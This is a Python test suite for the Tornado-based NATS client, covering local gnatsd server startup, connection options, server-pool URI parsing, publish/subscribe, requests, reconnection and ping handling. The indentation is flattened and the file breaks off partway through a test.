from nats import __lang__, __version__
class Gnatsd(object):
def __init__(
self,
port=4222,
user="",
password="",
timeout=0,
http_port=8222,
config_file=None,
debug=False,
conf=None,
cluster_port=None,
):
self.port = port
self.user = user
self.password = password
self.timeout = timeout
self.http_port = http_port
self.cluster_port = cluster_port
self.proc = None
self.debug = debug
self.config_file = config_file
self.conf = conf
self.thread = None
env_debug_flag = os.environ.get("DEBUG_NATS_TEST")
if env_debug_flag == "true":
self.debug = True
def __enter__(self):
"""For when NATS client is used in a context manager"""
config_file = tempfile.NamedTemporaryFile(mode='w', delete=True)
self.config_file = config_file
self.config_file.write(self.conf)
self.config_file.flush()
t = threading.Thread(target=self.start)
self.thread = t
self.thread.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch(
'http://127.0.0.1:%d/varz' % self.http_port)
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
return self
def __exit__(self, *exc_info):
"""Close connection to NATS when used in a context manager"""
self.finish()
self.thread.join()
def start(self):
cmd = ["gnatsd"]
cmd.append("-p")
cmd.append("%d" % self.port)
cmd.append("-m")
cmd.append("%d" % self.http_port)
if self.cluster_port is not None:
cmd.append("--cluster")
cmd.append("nats://127.0.0.1:%d" % self.cluster_port)
if self.config_file is not None:
cmd.append("-c")
cmd.append(self.config_file.name)
if self.user != "":
cmd.append("--user")
cmd.append(self.user)
if self.password != "":
cmd.append("--pass")
cmd.append(self.password)
if self.debug:
cmd.append("-DV")
if self.debug:
self.proc = subprocess.Popen(cmd)
else:
# Redirect to dev null all server output
devnull = open(os.devnull, 'w')
self.proc = subprocess.Popen(
cmd, stdout=devnull, stderr=subprocess.STDOUT)
if self.debug:
if self.proc is None:
print(
"[\031[0;33mDEBUG\033[0;0m] Failed to start server listening on port %d started."
% self.port)
else:
print(
"[\033[0;33mDEBUG\033[0;0m] Server listening on port %d started."
% self.port)
def finish(self):
if self.debug:
print(
"[\033[0;33mDEBUG\033[0;0m] Server listening on %d will stop."
% self.port)
if self.debug and self.proc is None:
print(
"[\033[0;31mDEBUG\033[0;0m] Failed terminating server listening on port %d"
% self.port)
else:
try:
self.proc.terminate()
self.proc.wait()
except Exception as e:
if self.debug:
print(
"[\033[0;33m WARN\033[0;0m] Could not stop server listening on %d. (%s)"
% (self.port, e))
if self.debug:
print(
"[\033[0;33mDEBUG\033[0;0m] Server listening on %d was stopped."
% self.port)
class Log():
def __init__(self, debug=False):
self.records = Hash(list)
self.debug = debug
def persist(self, msg):
if self.debug:
print(
"[\033[0;33mDEBUG\033[0;0m] Message received: [{0} {1} {2}].".
format(msg.subject, msg.reply, msg.data))
self.records[msg.subject].append(msg)
class ClientUtilsTest(unittest.TestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
def test_default_connect_command(self):
nc = Client()
nc.options["verbose"] = False
nc.options["pedantic"] = False
nc.options["auth_required"] = False
nc.options["name"] = None
nc.options["no_echo"] = False
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "pedantic": false, "protocol": 1, "verbose": false, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
def test_default_connect_command_with_name(self):
nc = Client()
nc.options["verbose"] = False
nc.options["pedantic"] = False
nc.options["auth_required"] = False
nc.options["name"] = "secret"
nc.options["no_echo"] = False
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "name": "secret", "pedantic": false, "protocol": 1, "verbose": false, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
def tests_generate_new_inbox(self):
inbox = new_inbox()
self.assertTrue(inbox.startswith(INBOX_PREFIX))
min_expected_len = len(INBOX_PREFIX)
self.assertTrue(len(inbox) > min_expected_len)
class ClientTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
server = Gnatsd(port=4222)
self.server_pool.append(server)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch('http://127.0.0.1:8222/varz')
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientTest, self).setUp()
def tearDown(self):
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
super(ClientTest, self).tearDown()
@tornado.testing.gen_test
def test_connect_verbose(self):
nc = Client()
options = {"verbose": True, "io_loop": self.io_loop}
yield nc.connect(**options)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "pedantic": false, "protocol": 1, "verbose": true, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
@tornado.testing.gen_test
def test_connect_pedantic(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop, pedantic=True)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
got = nc.connect_command()
expected = 'CONNECT {"echo": true, "lang": "python2", "pedantic": true, "protocol": 1, "verbose": false, "version": "%s"}\r\n' % __version__
self.assertEqual(expected, got)
@tornado.testing.gen_test
def test_connect_custom_connect_timeout(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop, connect_timeout=1)
self.assertEqual(1, nc.options["connect_timeout"])
@tornado.testing.gen_test
def test_parse_info(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
self.assertIn("server_id", info_keys)
self.assertIn("version", info_keys)
self.assertIn("go", info_keys)
self.assertIn("host", info_keys)
self.assertIn("port", info_keys)
self.assertIn("max_payload", info_keys)
self.assertIn("client_id", info_keys)
def test_connect_syntax_sugar(self):
nc = NATS()
nc._setup_server_pool(["nats://127.0.0.1:4222", "nats://127.0.0.1:4223", "nats://127.0.0.1:4224"])
self.assertEqual(3, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("nats://127.0.0.1:4222")
self.assertEqual(1, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("127.0.0.1:4222")
self.assertEqual(1, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("nats://127.0.0.1:")
self.assertEqual(1, len(nc._server_pool))
nc = NATS()
nc._setup_server_pool("127.0.0.1")
self.assertEqual(1, len(nc._server_pool))
self.assertEqual(4222, nc._server_pool[0].uri.port)
nc = NATS()
nc._setup_server_pool("demo.nats.io")
self.assertEqual(1, len(nc._server_pool))
self.assertEqual("demo.nats.io", nc._server_pool[0].uri.hostname)
self.assertEqual(4222, nc._server_pool[0].uri.port)
nc = NATS()
nc._setup_server_pool("localhost:")
self.assertEqual(1, len(nc._server_pool))
self.assertEqual(4222, nc._server_pool[0].uri.port)
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("::")
self.assertEqual(0, len(nc._server_pool))
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("nats://")
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("://")
self.assertEqual(0, len(nc._server_pool))
nc = NATS()
with self.assertRaises(NatsError):
nc._setup_server_pool("")
self.assertEqual(0, len(nc._server_pool))
# Auth examples
nc = NATS()
nc._setup_server_pool("hello:[email protected]:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("hello", uri.username)
self.assertEqual("world", uri.password)
nc = NATS()
nc._setup_server_pool("hello:@demo.nats.io:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("hello", uri.username)
self.assertEqual("", uri.password)
nc = NATS()
nc._setup_server_pool(":@demo.nats.io:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("", uri.username)
self.assertEqual("", uri.password)
nc = NATS()
nc._setup_server_pool("@demo.nats.io:4222")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("", uri.username)
self.assertEqual(None, uri.password)
nc = NATS()
nc._setup_server_pool("@demo.nats.io:")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual(None, uri.username)
self.assertEqual(None, uri.password)
nc = NATS()
nc._setup_server_pool("@demo.nats.io")
self.assertEqual(1, len(nc._server_pool))
uri = nc._server_pool[0].uri
self.assertEqual("demo.nats.io", uri.hostname)
self.assertEqual(4222, uri.port)
self.assertEqual("", uri.username)
self.assertEqual(None, uri.password)
@tornado.testing.gen_test(timeout=5)
def test_connect_fails(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = False
def disconnected_cb(self):
self.disconnected_cb_called = True
client = SampleClient()
with self.assertRaises(ErrNoServers):
options = {
"servers": ["nats://127.0.0.1:4223"],
"close_cb": client.disconnected_cb,
"allow_reconnect": False,
"io_loop": self.io_loop
}
yield client.nc.connect(**options)
self.assertFalse(client.disconnected_cb_called)
@tornado.testing.gen_test(timeout=5)
def test_connect_fails_allow_reconnect(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = False
self.closed_cb_called = False
def disconnected_cb(self):
self.disconnected_cb_called = True
def closed_cb(self):
self.closed_cb_called = True
client = SampleClient()
with self.assertRaises(ErrNoServers):
options = {
"servers": ["nats://127.0.0.1:4223"],
"disconnected_cb": client.disconnected_cb,
"close_cb": client.closed_cb,
"allow_reconnect": True,
"io_loop": self.io_loop,
"max_reconnect_attempts": 2
}
yield client.nc.connect(**options)
self.assertFalse(client.disconnected_cb_called)
self.assertFalse(client.closed_cb_called)
@tornado.testing.gen_test(timeout=5)
def test_reconnect_fail_calls_closed_cb(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = tornado.concurrent.Future()
self.closed_cb_called = tornado.concurrent.Future()
def disconnected_cb(self):
if not self.disconnected_cb_called.done():
self.disconnected_cb_called.set_result(True)
def closed_cb(self):
if not self.closed_cb_called.done():
self.closed_cb_called.set_result(True)
c = SampleClient()
options = {
"servers": ["nats://127.0.0.1:4449"],
"closed_cb": c.closed_cb,
"disconnected_cb": c.disconnected_cb,
"allow_reconnect": True,
"loop": self.io_loop,
"max_reconnect_attempts": 2,
"reconnect_time_wait": 0.1
}
with Gnatsd(port=4449, http_port=8449, conf="") as natsd:
yield c.nc.connect(**options)
natsd.finish()
yield tornado.gen.with_timeout(timedelta(seconds=1), c.disconnected_cb_called)
yield tornado.gen.with_timeout(timedelta(seconds=2), c.closed_cb_called)
@tornado.testing.gen_test(timeout=5)
def test_connect_fails_allow_reconnect_forever_until_close(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.disconnected_cb_called = False
self.closed_cb_called = False
def disconnected_cb(self):
self.disconnected_cb_called = True
def close_cb(self):
self.closed_cb_called = True
client = SampleClient()
options = {
"servers": ["nats://127.0.0.1:4223"],
"close_cb": client.close_cb,
"disconnected_cb": client.disconnected_cb,
"allow_reconnect": True,
"io_loop": self.io_loop,
"max_reconnect_attempts": -1,
"reconnect_time_wait": 0.1
}
self.io_loop.spawn_callback(client.nc.connect, **options)
yield tornado.gen.sleep(2)
yield client.nc.close()
self.assertTrue(client.nc._server_pool[0].reconnects > 10)
self.assertTrue(client.disconnected_cb_called)
self.assertTrue(client.closed_cb_called)
@tornado.testing.gen_test
def test_iostream_closed_on_op_error(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
self.assertEqual(nc.stats['reconnects'], 0)
old_io = nc.io
# Unbind and reconnect.
yield nc._process_op_err()
self.assertTrue(nc.is_connected)
self.assertEqual(nc.stats['reconnects'], 1)
self.assertTrue(old_io.closed())
self.assertFalse(nc.io.closed())
# Unbind, but don't reconnect.
nc.options["allow_reconnect"] = False
yield nc._process_op_err()
self.assertFalse(nc.is_connected)
self.assertTrue(nc.io.closed())
@tornado.testing.gen_test
def test_flusher_exits_on_op_error(self):
class FlusherClient(Client):
def __init__(self, *args, **kwargs):
super(FlusherClient, self).__init__(*args, **kwargs)
self.flushers_running = {}
@tornado.gen.coroutine
def _flusher_loop(self):
flusher_id = len(self.flushers_running)
self.flushers_running.update({flusher_id: True})
yield super(FlusherClient, self)._flusher_loop()
self.flushers_running.update({flusher_id: False})
nc = FlusherClient()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
self.assertEqual(len(nc.flushers_running), 1)
self.assertTrue(nc.flushers_running[0])
# Unbind and reconnect.
yield nc._process_op_err()
self.assertTrue(nc.is_connected)
self.assertEqual(len(nc.flushers_running), 2)
self.assertFalse(nc.flushers_running[0])
self.assertTrue(nc.flushers_running[1])
# Unbind, but don't reconnect.
nc.options["allow_reconnect"] = False
yield nc._process_op_err()
yield tornado.gen.sleep(0.1)
self.assertFalse(nc.is_connected)
self.assertTrue(nc.io.closed())
self.assertEqual(len(nc.flushers_running), 2)
self.assertFalse(nc.flushers_running[0])
self.assertFalse(nc.flushers_running[1])
@tornado.testing.gen_test
def test_subscribe(self):
nc = Client()
options = {"io_loop": self.io_loop}
yield nc.connect(**options)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
inbox = new_inbox()
yield nc.subscribe("help.1")
yield nc.subscribe("help.2")
yield tornado.gen.sleep(0.5)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/connz' % self.server_pool[0].http_port)
result = json.loads(response.body)
connz = result['connections'][0]
self.assertEqual(2, connz['subscriptions'])
@tornado.testing.gen_test
def test_subscribe_sync(self):
nc = Client()
msgs = []
@tornado.gen.coroutine
def subscription_handler(msg):
# Futures for subscription are each processed
# in sequence.
if msg.subject == "tests.1":
yield tornado.gen.sleep(1.0)
if msg.subject == "tests.3":
yield tornado.gen.sleep(1.0)
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[1].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_sync_non_coro(self):
nc = Client()
msgs = []
def subscription_handler(msg):
# Callback blocks so dispatched in sequence.
if msg.subject == "tests.1":
time.sleep(0.5)
if msg.subject == "tests.3":
time.sleep(0.2)
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[1].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_async(self):
nc = Client()
msgs = []
@tornado.gen.coroutine
def subscription_handler(msg):
# Callback dispatched asynchronously and a coroutine
# so it does not block.
if msg.subject == "tests.1":
yield tornado.gen.sleep(0.5)
if msg.subject == "tests.3":
yield tornado.gen.sleep(0.2)
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe_async("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[4].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_async_non_coro(self):
nc = Client()
msgs = []
def subscription_handler(msg):
# Dispatched asynchronously but would be received in sequence...
msgs.append(msg)
yield nc.connect(io_loop=self.io_loop)
sid = yield nc.subscribe_async("tests.>", cb=subscription_handler)
for i in range(0, 5):
yield nc.publish("tests.{0}".format(i), b'bar')
# Wait a bit for messages to be received.
yield tornado.gen.sleep(4.0)
self.assertEqual(5, len(msgs))
self.assertEqual("tests.1", msgs[1].subject)
self.assertEqual("tests.3", msgs[3].subject)
yield nc.close()
@tornado.testing.gen_test
def test_publish(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
log = Log()
yield nc.subscribe(">", "", log.persist)
yield nc.publish("one", "hello")
yield nc.publish("two", "world")
yield tornado.gen.sleep(1.0)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(10, varz['in_bytes'])
self.assertEqual(10, varz['out_bytes'])
self.assertEqual(2, varz['in_msgs'])
self.assertEqual(2, varz['out_msgs'])
self.assertEqual(2, len(log.records.keys()))
self.assertEqual("hello", log.records['one'][0].data)
self.assertEqual("world", log.records['two'][0].data)
self.assertEqual(10, nc.stats['in_bytes'])
self.assertEqual(10, nc.stats['out_bytes'])
self.assertEqual(2, nc.stats['in_msgs'])
self.assertEqual(2, nc.stats['out_msgs'])
@tornado.testing.gen_test(timeout=15)
def test_publish_race_condition(self):
# This tests a race condition fixed in #23 where a series of
# large publishes followed by a flush and another publish
# will cause the last publish to never get written.
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
@tornado.gen.coroutine
def sub(msg):
sub.msgs.append(msg)
if len(sub.msgs) == 501:
sub.future.set_result(True)
sub.msgs = []
sub.future = tornado.concurrent.Future()
yield nc.subscribe("help.*", cb=sub)
# Close to 1MB payload
payload = "A" * 1000000
# Publish messages from 0..499
for i in range(500):
yield nc.publish("help.%s" % i, payload)
# Relinquish control often to unblock the flusher
yield tornado.gen.sleep(0)
yield nc.publish("help.500", "A")
# Wait for the future to yield after receiving all the messages.
try:
yield tornado.gen.with_timeout(timedelta(seconds=10), sub.future)
except:
# Skip timeout in case it may occur and let test fail
# when checking how many messages we received in the end.
pass
# We should definitely have all the messages
self.assertEqual(len(sub.msgs), 501)
for i in range(501):
self.assertEqual(sub.msgs[i].subject, u"help.%s" % (i))
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(500000001, varz['in_bytes'])
self.assertEqual(500000001, varz['out_bytes'])
self.assertEqual(501, varz['in_msgs'])
self.assertEqual(501, varz['out_msgs'])
self.assertEqual(500000001, nc.stats['in_bytes'])
self.assertEqual(500000001, nc.stats['out_bytes'])
self.assertEqual(501, nc.stats['in_msgs'])
self.assertEqual(501, nc.stats['out_msgs'])
@tornado.testing.gen_test(timeout=15)
def test_publish_flush_race_condition(self):
# This tests a race condition fixed in #23 where a series of
# large publishes followed by a flush and another publish
# will cause the last publish to never get written.
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertTrue(nc.is_connected)
@tornado.gen.coroutine
def sub(msg):
sub.msgs.append(msg)
if len(sub.msgs) == 501:
sub.future.set_result(True)
sub.msgs = []
sub.future = tornado.concurrent.Future()
yield nc.subscribe("help.*", cb=sub)
# Close to 1MB payload
payload = "A" * 1000000
# Publish messages from 0..499
for i in range(500):
yield nc.publish("help.%s" % i, payload)
if i % 10 == 0:
# Relinquish control often to unblock the flusher
yield tornado.gen.sleep(0)
yield nc.publish("help.500", "A")
# Flushing and doing ping/pong should not cause commands
# to be dropped either.
yield nc.flush()
# Wait for the future to yield after receiving all the messages.
try:
yield tornado.gen.with_timeout(timedelta(seconds=10), sub.future)
except:
# Skip timeout in case it may occur and let test fail
# when checking how many messages we received in the end.
pass
# We should definitely have all the messages
self.assertEqual(len(sub.msgs), 501)
for i in range(501):
self.assertEqual(sub.msgs[i].subject, u"help.%s" % (i))
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(500000001, varz['in_bytes'])
self.assertEqual(500000001, varz['out_bytes'])
self.assertEqual(501, varz['in_msgs'])
self.assertEqual(501, varz['out_msgs'])
self.assertEqual(500000001, nc.stats['in_bytes'])
self.assertEqual(500000001, nc.stats['out_bytes'])
self.assertEqual(501, nc.stats['in_msgs'])
self.assertEqual(501, nc.stats['out_msgs'])
@tornado.testing.gen_test
def test_unsubscribe(self):
nc = Client()
options = {"io_loop": self.io_loop}
yield nc.connect(**options)
log = Log()
sid = yield nc.subscribe("foo", cb=log.persist)
yield nc.publish("foo", b'A')
yield nc.publish("foo", b'B')
yield tornado.gen.sleep(1)
sub = nc._subs[sid]
yield nc.unsubscribe(sid)
yield nc.flush()
self.assertEqual(sub.closed, True)
yield nc.publish("foo", b'C')
yield nc.publish("foo", b'D')
self.assertEqual(2, len(log.records["foo"]))
self.assertEqual(b'A', log.records["foo"][0].data)
self.assertEqual(b'B', log.records["foo"][1].data)
# Should not exist by now
with self.assertRaises(KeyError):
nc._subs[sid].received
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/connz' % self.server_pool[0].http_port)
result = json.loads(response.body)
connz = result['connections'][0]
self.assertEqual(0, connz['subscriptions'])
@tornado.testing.gen_test
def test_unsubscribe_only_if_max_reached(self):
nc = Client()
options = {"io_loop": self.io_loop}
yield nc.connect(**options)
log = Log()
sid = yield nc.subscribe("foo", cb=log.persist)
yield nc.publish("foo", b'A')
yield nc.publish("foo", b'B')
yield nc.publish("foo", b'C')
yield tornado.gen.sleep(1)
self.assertEqual(3, len(log.records["foo"]))
sub = nc._subs[sid]
yield nc.unsubscribe(sid, 3)
self.assertEqual(sub.closed, True)
yield nc.publish("foo", b'D')
yield nc.flush()
self.assertEqual(3, len(log.records["foo"]))
self.assertEqual(b'A', log.records["foo"][0].data)
self.assertEqual(b'B', log.records["foo"][1].data)
self.assertEqual(b'C', log.records["foo"][2].data)
# Should not exist by now
yield tornado.gen.sleep(1)
with self.assertRaises(KeyError):
nc._subs[sid].received
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/connz' % self.server_pool[0].http_port)
result = json.loads(response.body)
connz = result['connections'][0]
self.assertEqual(0, connz['subscriptions'])
@tornado.testing.gen_test
def test_request(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
class Component:
def __init__(self, nc):
self.nc = nc
self.replies = []
@tornado.gen.coroutine
def receive_responses(self, msg=None):
self.replies.append(msg)
@tornado.gen.coroutine
def respond(self, msg=None):
yield self.nc.publish(msg.reply, "ok:1")
yield self.nc.publish(msg.reply, "ok:2")
yield self.nc.publish(msg.reply, "ok:3")
log = Log()
c = Component(nc)
yield nc.subscribe(">", "", log.persist)
yield nc.subscribe("help", "", c.respond)
yield nc.request("help", "please", expected=2, cb=c.receive_responses)
subs = []
for _, sub in nc._subs.items():
subs.append(sub)
self.assertEqual(len(subs), 3)
yield tornado.gen.sleep(0.5)
self.assertEqual(len(self.io_loop._callbacks), 0)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(18, varz['in_bytes'])
self.assertEqual(32, varz['out_bytes'])
self.assertEqual(4, varz['in_msgs'])
self.assertEqual(7, varz['out_msgs'])
self.assertEqual(2, len(log.records.keys()))
self.assertEqual("please", log.records['help'][0].data)
self.assertEqual(2, len(c.replies))
self.assertEqual(32, nc.stats['in_bytes'])
self.assertEqual(18, nc.stats['out_bytes'])
self.assertEqual(7, nc.stats['in_msgs'])
self.assertEqual(4, nc.stats['out_msgs'])
full_msg = ''
for msg in log.records['help']:
full_msg += msg.data
self.assertEqual('please', full_msg)
self.assertEqual("ok:1", c.replies[0].data)
self.assertEqual("ok:2", c.replies[1].data)
yield nc.close()
@tornado.testing.gen_test
def test_timed_request(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
class Component:
def __init__(self, nc):
self.nc = nc
@tornado.gen.coroutine
def respond(self, msg=None):
yield self.nc.publish(msg.reply, "ok:1")
yield self.nc.publish(msg.reply, "ok:2")
yield self.nc.publish(msg.reply, "ok:3")
log = Log()
c = Component(nc)
yield nc.subscribe(">", "", log.persist)
yield nc.subscribe("help", "", c.respond)
reply = yield nc.timed_request("help", "please")
self.assertEqual("ok:1", reply.data)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(18, varz['in_bytes'])
self.assertEqual(28, varz['out_bytes'])
self.assertEqual(4, varz['in_msgs'])
self.assertEqual(6, varz['out_msgs'])
self.assertEqual(2, len(log.records.keys()))
self.assertEqual("please", log.records['help'][0].data)
self.assertEqual(28, nc.stats['in_bytes'])
self.assertEqual(18, nc.stats['out_bytes'])
self.assertEqual(6, nc.stats['in_msgs'])
self.assertEqual(4, nc.stats['out_msgs'])
full_msg = ''
for msg in log.records['help']:
full_msg += msg.data
self.assertEqual('please', full_msg)
# There should not be lingering inboxes with requests by default
self.assertEqual(len(c.nc._subs), 2)
@tornado.testing.gen_test
def test_publish_max_payload(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
with self.assertRaises(ErrMaxPayload):
yield nc.publish("large-message",
"A" * (nc._server_info["max_payload"] * 2))
@tornado.testing.gen_test
def test_publish_request(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
self.assertEqual(Client.CONNECTED, nc._status)
info_keys = nc._server_info.keys()
self.assertTrue(len(info_keys) > 0)
inbox = new_inbox()
yield nc.publish_request("help.1", inbox, "hello")
yield nc.publish_request("help.2", inbox, "world")
yield tornado.gen.sleep(1.0)
http = tornado.httpclient.AsyncHTTPClient()
response = yield http.fetch(
'http://127.0.0.1:%d/varz' % self.server_pool[0].http_port)
varz = json.loads(response.body)
self.assertEqual(10, varz['in_bytes'])
self.assertEqual(0, varz['out_bytes'])
self.assertEqual(2, varz['in_msgs'])
self.assertEqual(0, varz['out_msgs'])
self.assertEqual(0, nc.stats['in_bytes'])
self.assertEqual(10, nc.stats['out_bytes'])
self.assertEqual(0, nc.stats['in_msgs'])
self.assertEqual(2, nc.stats['out_msgs'])
@tornado.testing.gen_test
def test_customize_io_buffers(self):
class Component():
def __init__(self):
self.nc = Client()
self.errors = []
self.disconnected_cb_called = 0
self.closed_cb_called = 0
def error_cb(self, e):
self.errors.append(e)
def close_cb(self):
self.closed_cb_called += 1
def disconnected_cb(self):
self.disconnected_cb_called += 1
c = Component()
options = {
"io_loop": self.io_loop,
"max_read_buffer_size": 1024,
"max_write_buffer_size": 50,
"read_chunk_size": 10,
"error_cb": c.error_cb,
"close_cb": c.close_cb,
"disconnected_cb": c.disconnected_cb
}
with self.assertRaises(tornado.iostream.StreamBufferFullError):
yield c.nc.connect(**options)
self.assertFalse(c.nc.is_connected)
self.assertEqual(1024, c.nc._max_read_buffer_size)
self.assertEqual(50, c.nc._max_write_buffer_size)
self.assertEqual(10, c.nc._read_chunk_size)
@tornado.testing.gen_test
def test_default_ping_interval(self):
class Parser():
def __init__(self, nc, t):
self.nc = nc
self.t = t
@tornado.gen.coroutine
def parse(self, data=''):
self.t.assertEqual(1, len(self.nc._pongs))
yield self.nc._process_pong()
self.t.assertEqual(0, len(self.nc._pongs))
nc = Client()
nc._ps = Parser(nc, self)
yield nc.connect(io_loop=self.io_loop)
yield tornado.gen.sleep(1)
self.assertEqual(0, nc._pings_outstanding)
self.assertTrue(nc.is_connected)
@tornado.testing.gen_test
def test_custom_ping_interval(self):
# Wait to be disconnected due to ignoring pings.
disconnected = tornado.concurrent.Future()
class Parser():
def __init__(self, nc):
self.nc = nc
self.pongs = []
@tornado.gen.coroutine
def parse(self, data=''):
if b'PONG' in data:
self.pongs.append(data)
yield self.nc._process_pong()
def disconnected_cb():
if not disconnected.done():
disconnected.set_result(True)
nc = NATS()
nc._ps = Parser(nc)
yield nc.connect(
loop=self.io_loop,
ping_interval=0.1,
max_outstanding_pings=10,
disconnected_cb=disconnected_cb,
)
yield tornado.gen.with_timeout(timedelta(seconds=5), disconnected)
self.assertTrue(len(nc._ps.pongs) > 5)
yield nc.close()
@tornado.testing.gen_test
def test_ping_slow_replies(self):
pongs = []
class Parser():
def __init__(self, nc):
self.nc = nc
@tornado.gen.coroutine
def parse(self, data=''):
pongs.append(data) # but, don't process now
nc = Client()
nc._ps = Parser(nc)
yield nc.connect(
io_loop=self.io_loop, ping_interval=0.1, max_outstanding_pings=20)
yield tornado.gen.sleep(1)
# Should have received more than 5 pongs, but processed none.
self.assertTrue(len(pongs) > 5)
self.assertTrue(len(pongs) <= nc._pings_outstanding)
self.assertEqual(0, nc._pongs_received)
self.assertEqual(len(nc._pongs), nc._pings_outstanding)
# Process all that were sent.
expected_outstanding = nc._pings_outstanding
for i in range(nc._pings_outstanding):
yield nc._process_pong()
expected_outstanding -= 1
self.assertEqual(expected_outstanding, nc._pings_outstanding)
self.assertEqual(expected_outstanding, len(nc._pongs))
self.assertEqual(i + 1, nc._pongs_received)
@tornado.testing.gen_test
def test_flush_timeout(self):
class Parser():
def __init__(self, nc, t):
self.nc = nc
self.t = t
@tornado.gen.coroutine
